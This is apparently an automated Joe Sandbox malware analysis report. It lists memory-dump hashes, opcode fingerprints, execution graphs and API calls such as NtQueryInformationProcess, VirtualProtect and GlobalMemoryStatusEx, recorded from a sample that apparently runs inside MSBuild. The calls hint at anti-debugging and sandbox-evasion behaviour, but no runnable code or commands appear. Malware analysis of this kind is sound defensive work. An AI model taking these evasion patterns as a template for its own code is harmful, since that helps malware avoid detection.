                                                                                                  • Instruction ID: 3d788a463341c2c0454b87676091872f11692dacc923d00ffcb9266ba00f7e1d
                                                                                                  • Opcode Fuzzy Hash: 61c46c9de6699f4c842933e42990f12ae56254b12021df6845d4988f919c60cd
                                                                                                  • Instruction Fuzzy Hash: 47018C31F101101BDF6995ADA85472FA3DAEBCA714F20883AE60EC7389EA65DC024B95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6ccda6ca5ae830e6f7b0c0acc11e907878c3b212b56bd5ab46ce7c8028829e71
                                                                                                  • Instruction ID: fc282632cb54d7ef1205e76d3b0362b6e930c341224d93f31b3cb3d4a6d684e6
                                                                                                  • Opcode Fuzzy Hash: 6ccda6ca5ae830e6f7b0c0acc11e907878c3b212b56bd5ab46ce7c8028829e71
                                                                                                  • Instruction Fuzzy Hash: 3701DC71B001155BCF6895ADF860B2EA2DAEBCA624F108439E10AC7344EE25DC020B85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b2cf76edf3c071211b188f4a43a49f0847dc622474cb57990a4a18eb10e70966
                                                                                                  • Instruction ID: 0005bca1e6d491764b2c05fee2457291a6aceb4e602e96b859def317c5e52a02
                                                                                                  • Opcode Fuzzy Hash: b2cf76edf3c071211b188f4a43a49f0847dc622474cb57990a4a18eb10e70966
                                                                                                  • Instruction Fuzzy Hash: 60013130B006155BDB68EA7CE99571FB3D6EB8E719F108429E50AC7384DE25EC428785
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e71a7aa383d1f5714bba87d5a3f8d7dd17248cba1d7f2adbf72ee37f1b64994f
                                                                                                  • Instruction ID: faafd30686e33b62ed0e72d0c3a5d1d7e42fd830cf6bfcc78ccd50eb9245cd4f
                                                                                                  • Opcode Fuzzy Hash: e71a7aa383d1f5714bba87d5a3f8d7dd17248cba1d7f2adbf72ee37f1b64994f
                                                                                                  • Instruction Fuzzy Hash: 6701C831F202249BCF68AA69F94169EB779FB85754F10453AE911EB345DB31EC04CBC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf9b24f8f4d5bfc2b18a081bca8f568ae623cb49936876d3be659410cf93448c
                                                                                                  • Instruction ID: aec2ef0e17568b827625aa0ce5ff6f18f7fe650e6508dcc8d3dab82b0d0879da
                                                                                                  • Opcode Fuzzy Hash: bf9b24f8f4d5bfc2b18a081bca8f568ae623cb49936876d3be659410cf93448c
                                                                                                  • Instruction Fuzzy Hash: E8E02272E152097BDF60CE30CDA5B8B3B9DEB42254F1044A6F044C7102E133DA01CBA2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2222239885
                                                                                                  • Opcode ID: daa36fd274f66c3552969c7d5f17a2d3c7f3c764cf7092a379f8395fd30a1969
                                                                                                  • Instruction ID: 5fce0211999c887c464623b5a27f64f9233a1da54eb51de3d054ab11705e25f7
                                                                                                  • Opcode Fuzzy Hash: daa36fd274f66c3552969c7d5f17a2d3c7f3c764cf7092a379f8395fd30a1969
                                                                                                  • Instruction Fuzzy Hash: D2122D30F102198FDF68DF65C954A6EB7B6BF89304F1089A9D40A9B355EB309D86CF81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-3823777903
                                                                                                  • Opcode ID: 85a9d0f2fd44534fff632a5a6bcf629534b209cbb82112c72b1627d5bcff474e
                                                                                                  • Instruction ID: 945d6f621312033e9b695a03080656efd4bef10831058042054a8f40e616d600
                                                                                                  • Opcode Fuzzy Hash: 85a9d0f2fd44534fff632a5a6bcf629534b209cbb82112c72b1627d5bcff474e
                                                                                                  • Instruction Fuzzy Hash: 1A915A30E103099FEF68DF74DA44B6EB7B6BF84304F108929E4069B299DB349D45CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-390881366
                                                                                                  • Opcode ID: d8e2051d9fd32eb69ddf8843e888ae6b30f15c5d9b5b72f279d0e93029184241
                                                                                                  • Instruction ID: c981435f97c2c756fe4162040e69a3f351620deb084d4b7a9a4c4a456c8bb23f
                                                                                                  • Opcode Fuzzy Hash: d8e2051d9fd32eb69ddf8843e888ae6b30f15c5d9b5b72f279d0e93029184241
                                                                                                  • Instruction Fuzzy Hash: CEF14C34A10209CFDB59EF68D554B6EB7B3BF88344F208569D4059B399DB31DC86CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: daf787ea71f3b7044507b5fa02edcb32e10ee86aec491e91ad6493423f9fb1db
                                                                                                  • Instruction ID: f0360a6abd195f6edf3e13a96d2c7849f4d8c2c5c3855b51912f13f786932fec
                                                                                                  • Opcode Fuzzy Hash: daf787ea71f3b7044507b5fa02edcb32e10ee86aec491e91ad6493423f9fb1db
                                                                                                  • Instruction Fuzzy Hash: A0B13B30A102098FDB58DB68D984B6EB7B2FF84304F248969D4069B395DB35DC86CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LR^q$LR^q$$^q$$^q
                                                                                                  • API String ID: 0-2454687669
                                                                                                  • Opcode ID: 1c9663026f1e81689623c5d39fe74dfcfdae34740bc035ccf6f261f30f507e44
                                                                                                  • Instruction ID: b0135f40caa891f47c076b357134d4b83bc78db5305f6d0e375cee88c44267a9
                                                                                                  • Opcode Fuzzy Hash: 1c9663026f1e81689623c5d39fe74dfcfdae34740bc035ccf6f261f30f507e44
                                                                                                  • Instruction Fuzzy Hash: F151B134B006059FDF59EB68D940A6AB7E2FF84304F148969E806DB3A9DB31EC45CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: 5159ff65c050c3b4d75475ff64be41234bf4406cc31458c60ab48bfe2421d536
                                                                                                  • Instruction ID: b5609160fbe124c896890c0ca6fa35491c46f4237a4eeca7ea6af99179c9b5d2
                                                                                                  • Opcode Fuzzy Hash: 5159ff65c050c3b4d75475ff64be41234bf4406cc31458c60ab48bfe2421d536
                                                                                                  • Instruction Fuzzy Hash: FC518C38E102059FDF69DB78D980AAEB7B2FB84311F108929E8169B359DB31DC45CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:19.5%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:33
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 7904 517baf0 7909 517bb1a 7904->7909 7905 517bb75 7914 517b14c 7905->7914 7908 517be1b 7909->7905 7909->7908 7910 517b134 7909->7910 7911 517cb78 OutputDebugStringW 7910->7911 7913 517cc24 7911->7913 7913->7909 7915 517cc70 FindCloseChangeNotification 7914->7915 7917 517cd00 7915->7917 7917->7908 7947 16084f8 7948 1608545 VirtualProtect 7947->7948 7949 16085b1 7948->7949 7918 5171818 7919 517182a 7918->7919 7923 5179f77 7919->7923 7927 5179f88 7919->7927 7920 5171847 7924 5179f88 7923->7924 7925 517a194 7924->7925 7931 517af78 7924->7931 7925->7920 7928 5179fa4 7927->7928 7929 517a194 7928->7929 7930 517af78 NtQueryInformationProcess 7928->7930 7929->7920 7930->7928 7932 517af8f 7931->7932 7935 517afc0 7932->7935 7936 517afe0 7935->7936 7939 517b4a8 7936->7939 7940 517b4cc 7939->7940 7941 517afa3 7940->7941 7943 517b0bc 7940->7943 7941->7924 7944 517b6f8 NtQueryInformationProcess 7943->7944 7946 517b7bf 7944->7946 7946->7940

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 368 517b0bc-517b7bd NtQueryInformationProcess 371 517b7c6-517b7fc 368->371 372 517b7bf-517b7c5 368->372 372->371
                                                                                                  APIs
                                                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0517B7AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1700279496.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_5170000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InformationProcessQuery
                                                                                                  • String ID:
                                                                                                  • API String ID: 1778838933-0
                                                                                                  • Opcode ID: e143d1439bc11fc841f632d489767206a5e63178290a4a90c4513be0882a7d53
                                                                                                  • Instruction ID: c34abf166b611f37afab0fc73cd2967dca8b1209fa8cc8e22fd8f6376c68f5ad
                                                                                                  • Opcode Fuzzy Hash: e143d1439bc11fc841f632d489767206a5e63178290a4a90c4513be0882a7d53
                                                                                                  • Instruction Fuzzy Hash: A04166B9D04258DFCB10DFAAD984A9EFBB5BB09310F20906AE914B7310D335A945CF68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 375 16084f0-16085af VirtualProtect 378 16085b1-16085b7 375->378 379 16085b8-16085f4 375->379 378->379
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0160859F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1694781832.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_1600000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: 151feda66d4146f5f9867718f936581d580bfec55a9ed8a3c6704ea78deed4ad
                                                                                                  • Instruction ID: 01f4fb770e93280f4c3d6fd2345fa5cbd0223c223a60ac1fea9d4c4fff58b0d7
                                                                                                  • Opcode Fuzzy Hash: 151feda66d4146f5f9867718f936581d580bfec55a9ed8a3c6704ea78deed4ad
                                                                                                  • Instruction Fuzzy Hash: 1631A9B9D042589FCB14CFA9D880AEEFBF5BB09310F24A02AE814B7250D335A945CF64
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 382 16084f8-16085af VirtualProtect 384 16085b1-16085b7 382->384 385 16085b8-16085f4 382->385 384->385
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0160859F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1694781832.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_1600000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: b443ade795dcbcd302fe81ba9dacb4615998e2dccda82d62b092d8ad4767d1ca
                                                                                                  • Instruction ID: 057a51f52bf4b8954994019ee60bc4280f7986902507ac1ff323fc3f850ba090
                                                                                                  • Opcode Fuzzy Hash: b443ade795dcbcd302fe81ba9dacb4615998e2dccda82d62b092d8ad4767d1ca
                                                                                                  • Instruction Fuzzy Hash: 7F3197B9D002589FCB14CFA9D884ADEFBF5BB19310F24902AE814B7254D375AA45CF68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 388 517b134-517cbd1 391 517cbe5-517cc22 OutputDebugStringW 388->391 392 517cbd3-517cbe2 388->392 393 517cc24-517cc2a 391->393 394 517cc2b-517cc59 391->394 392->391 393->394
                                                                                                  APIs
                                                                                                  • OutputDebugStringW.KERNELBASE(?), ref: 0517CC12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1700279496.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_5170000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugOutputString
                                                                                                  • String ID:
                                                                                                  • API String ID: 1166629820-0
                                                                                                  • Opcode ID: 269a5c0ab28aefdb932505858fb106cae7a1e2f122272ccc82966c19d5ef7329
                                                                                                  • Instruction ID: 711df8398a49cae7653b2db5e3f6b321de276ded0c32f3958c5503c01dcc529b
                                                                                                  • Opcode Fuzzy Hash: 269a5c0ab28aefdb932505858fb106cae7a1e2f122272ccc82966c19d5ef7329
                                                                                                  • Instruction Fuzzy Hash: 9C31BAB4D0424C9FCB14CFAAD584ADEFBF5AB49314F14806AE818B7320D734A945CFA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 397 517b14c-517ccfe FindCloseChangeNotification 400 517cd07-517cd3d 397->400 401 517cd00-517cd06 397->401 401->400
                                                                                                  APIs
                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0517CCEE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1700279496.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_5170000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                  • String ID:
                                                                                                  • API String ID: 2591292051-0
                                                                                                  • Opcode ID: ae847812ecfd2c644d8cab7050f943349a53ffab55c4864180222fe0ffa97a41
                                                                                                  • Instruction ID: a5a42e70231d88262e55f3ff267d34f90017043ea213d47d7f2163dda7a4d59d
                                                                                                  • Opcode Fuzzy Hash: ae847812ecfd2c644d8cab7050f943349a53ffab55c4864180222fe0ffa97a41
                                                                                                  • Instruction Fuzzy Hash: 3A31CEB9D04258DFCB10CFA9D584AEEFBF4AB09324F14906AE815B7310D334A944CFA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1693541890.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_131d000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1b71674727894f7d96fac160bd7d6cc879903e6a3d7476556a5ad66219ce1b92
                                                                                                  • Instruction ID: e6bd75a96849196df4f3bbd21745e97d63ff51a611ae7cdbbc542706cbf83a8f
                                                                                                  • Opcode Fuzzy Hash: 1b71674727894f7d96fac160bd7d6cc879903e6a3d7476556a5ad66219ce1b92
                                                                                                  • Instruction Fuzzy Hash: 00212871504244DFDB09DF94D9C8B17BFA5FB89318F24C269ED090B25AC33AD456CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1693638759.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_132d000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7e8cdb6b580e7c1b8ffd4848d3aacb1a22b4cd37a3ef85b2fea19ab74882d4a4
                                                                                                  • Instruction ID: 2d4bca506d6c10f509fa72c0bf036c2d87bffd7ded26d3fc09015cb9fca0d880
                                                                                                  • Opcode Fuzzy Hash: 7e8cdb6b580e7c1b8ffd4848d3aacb1a22b4cd37a3ef85b2fea19ab74882d4a4
                                                                                                  • Instruction Fuzzy Hash: 902126B1604204DFDB05EF98D9C0B26BFA5FB84318F20C56DDA4A4B356C33AD446CA61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1693638759.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_132d000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bb705cdcbb79cf56d3bc0b69dc8e8ed67df754192563a5875275943f8e530a8d
                                                                                                  • Instruction ID: a64b03eea1e92e92ce01722ed0e8a4d8cf048fa3cda8daff90893fb34399b75d
                                                                                                  • Opcode Fuzzy Hash: bb705cdcbb79cf56d3bc0b69dc8e8ed67df754192563a5875275943f8e530a8d
                                                                                                  • Instruction Fuzzy Hash: 11213471604244DFCB15EF58D9C4B26BFA5FB84318F20C56DD90A4B3A6C33AD447CAA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1693638759.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_132d000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4c120fd9e637aa4fb1dbfa551a092fd91d15b0dbeb9a2d237d232fbc8eedff0f
                                                                                                  • Instruction ID: eab9e6af0b08da1304d235bc731fe1c2a6d2039b2a3786e85e0a82558932054b
                                                                                                  • Opcode Fuzzy Hash: 4c120fd9e637aa4fb1dbfa551a092fd91d15b0dbeb9a2d237d232fbc8eedff0f
                                                                                                  • Instruction Fuzzy Hash: 4B2180755083809FCB03DF64D994711BF71EB46218F28C5DAD8498F2A7C33A981ACB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1693541890.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_131d000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                  • Instruction ID: ba8e5a391c5e7bbb8a0092afaa689b8fa973957b8bb94f1ab8d0a631d5b26575
                                                                                                  • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                  • Instruction Fuzzy Hash: B821DF76404280DFDB0ACF54D9C4B16BF72FB89318F24C2A9DD480B25AC33AD426CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1693638759.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_132d000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                  • Instruction ID: e395415657cdcff34176ddb32288aabc2022c6a31c98c64ebd8841f17e09795c
                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                  • Instruction Fuzzy Hash: 4C11DD75504280CFDB02DF58D5C4B15FFB1FB84318F24C6AAD9494B256C33AD40ACB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1693541890.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_131d000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4216ac8685c5f422c6f693d02da0113295ca762e82deca2a4669a37038844a0f
                                                                                                  • Instruction ID: 604d04e7b5afdb5e0183d45440cddce384e40e01f3bbe5dc0aeb1004e1dc1ee9
                                                                                                  • Opcode Fuzzy Hash: 4216ac8685c5f422c6f693d02da0113295ca762e82deca2a4669a37038844a0f
                                                                                                  • Instruction Fuzzy Hash: 8B01A7711083449AE7194E6AC988767BF9EEF42728F18C56AED494A18AC2799840CA71
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1693541890.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_131d000_jYRIGnZlROed.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 355d6b278f700b9607bd402588e7386069bb963c281a3cda5146b2d6c0d65ef6
                                                                                                  • Instruction ID: b492e81bd23c25393d47229950014a2fdfe46e40ac2d12634fa72b942800270d
                                                                                                  • Opcode Fuzzy Hash: 355d6b278f700b9607bd402588e7386069bb963c281a3cda5146b2d6c0d65ef6
                                                                                                  • Instruction Fuzzy Hash: CFF062714043449AE7158A1AD8C8B66FFA9EB41628F18C55AED494E28AC2799844CAB1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:11.3%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:50
                                                                                                  Total number of Limit Nodes:6
                                                                                                  execution_graph 24819 1230848 24821 123084e 24819->24821 24820 123091b 24821->24820 24824 1231380 24821->24824 24829 123148b 24821->24829 24827 1231396 24824->24827 24825 1231480 24825->24821 24827->24825 24828 123148b 2 API calls 24827->24828 24834 1237eb0 24827->24834 24828->24827 24831 1231396 24829->24831 24830 1231480 24830->24821 24831->24830 24832 1237eb0 2 API calls 24831->24832 24833 123148b 2 API calls 24831->24833 24832->24831 24833->24831 24835 1237eba 24834->24835 24836 1237ed4 24835->24836 24839 672fa3a 24835->24839 24844 672fa48 24835->24844 24836->24827 24841 672fa5d 24839->24841 24840 672fc72 24840->24836 24841->24840 24842 672fee8 GlobalMemoryStatusEx GlobalMemoryStatusEx 24841->24842 24843 672fc89 GlobalMemoryStatusEx GlobalMemoryStatusEx 24841->24843 24842->24841 24843->24841 24846 672fa5d 24844->24846 24845 672fc72 24845->24836 24846->24845 24847 672fee8 GlobalMemoryStatusEx GlobalMemoryStatusEx 24846->24847 24848 672fc89 GlobalMemoryStatusEx GlobalMemoryStatusEx 24846->24848 24847->24846 24848->24846 24849 123fef8 24850 123fefa 24849->24850 24851 123ff90 24850->24851 24853 672fee8 24850->24853 24855 672fcb9 24853->24855 24856 672fef2 24853->24856 24854 672fdea 24854->24851 24855->24854 24860 123eb00 24855->24860 24863 123eb10 24855->24863 24856->24851 24857 672fd68 24857->24851 24866 123eb39 24860->24866 24861 123eb1e 24861->24857 24864 123eb1e 24863->24864 24865 123eb39 2 API calls 24863->24865 24864->24857 24865->24864 24867 123eb55 24866->24867 24868 123eb7d 24866->24868 24867->24861 24872 123ec20 24868->24872 24875 123ebf5 24868->24875 24869 123eb9a 24869->24861 24873 123ec66 GlobalMemoryStatusEx 24872->24873 24874 123ec96 24873->24874 24874->24869 24876 123ebfc 24875->24876 24877 123ec03 24876->24877 24878 123ec66 GlobalMemoryStatusEx 24876->24878 24877->24869 24879 123ec96 24878->24879 24879->24869

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
